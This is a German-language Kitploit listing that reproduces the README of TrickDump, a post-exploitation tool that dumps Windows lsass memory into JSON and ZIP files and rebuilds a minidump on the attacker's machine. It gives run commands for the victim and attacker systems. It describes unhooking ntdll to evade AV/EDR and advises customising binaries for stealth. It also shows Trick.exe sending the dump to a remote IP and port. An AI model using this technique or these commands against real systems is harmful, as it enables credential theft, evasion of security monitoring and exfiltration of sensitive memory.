Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
TrickDump — Lsass mit ausschließlich NTAPI-Funktionen dumpen, dabei 3 JSON- und 1 ZIP-Datei erstellen... und die MiniDump-Datei später generieren! | Kitploit
Tools/GitHubGitHub/ricardojoserf/trickdump
SpeicherforensikPost-ExploitationRed Teaming
GitHubricardojoserf/trickdump

TrickDump

Lsass mit ausschließlich NTAPI-Funktionen dumpen, dabei 3 JSON- und 1 ZIP-Datei erstellen... und die MiniDump-Datei später generieren!

Repository anzeigenWebseite
5665821vor 25 TagenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

TrickDump

TrickDump dumpt den lsass-Prozess, ohne eine Minidump-Datei zu erstellen, und generiert stattdessen 3 JSON- und 1 ZIP-Datei mit den Speicherbereichs-Dumps. In drei Schritten:

  • Lock: Betriebssysteminformationen mit RtlGetVersion abrufen.

  • Shock: SeDebugPrivilege-Berechtigung mit NtOpenProcessToken und NtAdjustPrivilegeToken erlangen, ein Handle mit NtGetNextProcess und NtQueryInformationProcess öffnen und dann Modulinformationen mit NtQueryInformationProcess und NtReadVirtualMemory abrufen.

  • Barrel: SeDebugPrivilege-Berechtigung erlangen, ein Handle öffnen und dann Informationen abrufen und Speicherbereiche mit NtQueryVirtualMemory und NtReadVirtualMemory dumpen.

img

Im Angriffssystem verwenden Sie das Skript create_dump.py, um die Minidump-Datei zu generieren:

root@kitploit:~
python3 create_dump.py [-l LOCK_JSON] [-s SHOCK_JSON] [-b BARREL_JSON] [-z BARREL_ZIP] [-o OUTPUT_FILE] 

Die Vorteile dieser Technik sind:

  • Es befindet sich zu keinem Zeitpunkt eine gültige Minidump-Datei auf der Festplatte, im Arbeitsspeicher oder im Netzwerkverkehr.

  • Es gibt nicht nur ein einzelnes Programm oder einen Prozess, der den gesamten Angriff ausführt, sondern drei getrennte, was möglicherweise weniger Alarm auslöst.

    • Wenn Sie es vorziehen, nur ein Programm auszuführen, können Sie Trick verwenden.
    • Wenn Sie bereits Informationen über das Betriebssystem des Zielrechners haben, können Sie den ersten Schritt ("Lock") überspringen.
  • Die Programme verwenden ausschließlich NTAPIs (dieses Projekt ist eine Variante von NativeDump).

  • Es verwendet weder OpenProcess noch NtOpenProcess, um das Handle des lsass-Prozesses mit den Zugriffsrechten PROCESS_VM_OPERATION und PROCESS_VM_WRITE zu erhalten.

  • Jedes Programm erlaubt es, den ".text"-Abschnitt der ntdll.dll-Bibliothek zu überschreiben, um API-Hooking zu umgehen:

    • "disk": Verwendung einer bereits auf der Festplatte vorhandenen DLL. Wenn kein zweites Argument angegeben wird, lautet der Pfad "C:\Windows\System32\ntdll.dll".
    • "knowndlls": Verwendung des KnownDlls-Ordners.
    • "debugproc": Verwendung eines im Debug-Modus erstellten Prozesses. Wenn kein zweites Argument angegeben wird, lautet der Prozess "c:\windows\system32\calc.exe".

Es ist in verschiedenen Sprachen verfügbar:

  • .NET: Der Hauptzweig
  • Python: Der python-flavour-Zweig
  • Golang: Der golang-flavour-Zweig
  • C/C++: Der c-flavour-Zweig
  • BOF-Dateien: Der bof-flavour-Zweig
  • Crystal: Der crystal-flavour-Zweig
  • Nim: Der nim-flavour-Zweig
  • Rust: Der rust-flavour-Zweig

Es funktioniert nicht, wenn PPL aktiviert ist, die PEB-Struktur nicht lesbar ist oder die Binärdateien nicht als 64-Bit kompiliert sind. Update: Jetzt ist es möglich, die Programme auszuführen, ohne die PEB zu lesen, siehe den peb-unreadable-Zweig :)

Die Technik funktioniert einwandfrei auf den neuesten Windows-Versionen und wurde gegen gängige AV- und EDR-Lösungen getestet, aber die Tarnung hängt von der gewählten "Spielart" ab: Verwenden Sie ungewöhnliche Sprachen und passen Sie die Binärdateien für die besten Ergebnisse an!


Verwendung

Die Programme werden im Opfersystem ausgeführt und erstellen drei JSON-Dateien (mit Informationen zu Speicherbereichen) und eine ZIP-Datei (mit jedem Speicherbereichs-Dump).

root@kitploit:~
Lock.exe [disk/knowndlls/debugproc]
root@kitploit:~
Shock.exe [disk/knowndlls/debugproc]
root@kitploit:~
Barrel.exe [disk/knowndlls/debugproc]

Sie können die Programme direkt ausführen, ohne die ntdll.dll-Bibliothek zu überschreiben:

img1

Oder verwenden Sie eine der drei verschiedenen Überschreibungstechniken:

img2

Dann wird die Minidump-Datei generiert:

img3


Alles in einem

Wenn Sie es vorziehen, nur eine Binärdatei auszuführen, generiert Trick.exe eine ZIP-Datei, die die 3 JSON-Dateien und die ZIP-Datei mit den Speicherbereichen enthält:

root@kitploit:~
Trick.exe [disk/knowndlls/debugproc] [IP_ADDRESS] [PORT]

Sie können die ZIP-Datei lokal erstellen, optional unter Verwendung einer Ntdll-Überschreibungsmethode:

img5

Oder senden Sie sie an einen entfernten Port, indem Sie den zweiten und dritten Parameter als IP-Adresse und Port verwenden:

img6

In beiden Fällen erhalten Sie eine ZIP-Datei wie diese, entpacken Sie sie und erstellen Sie die Minidump-Datei:

img7

Tool herunterladen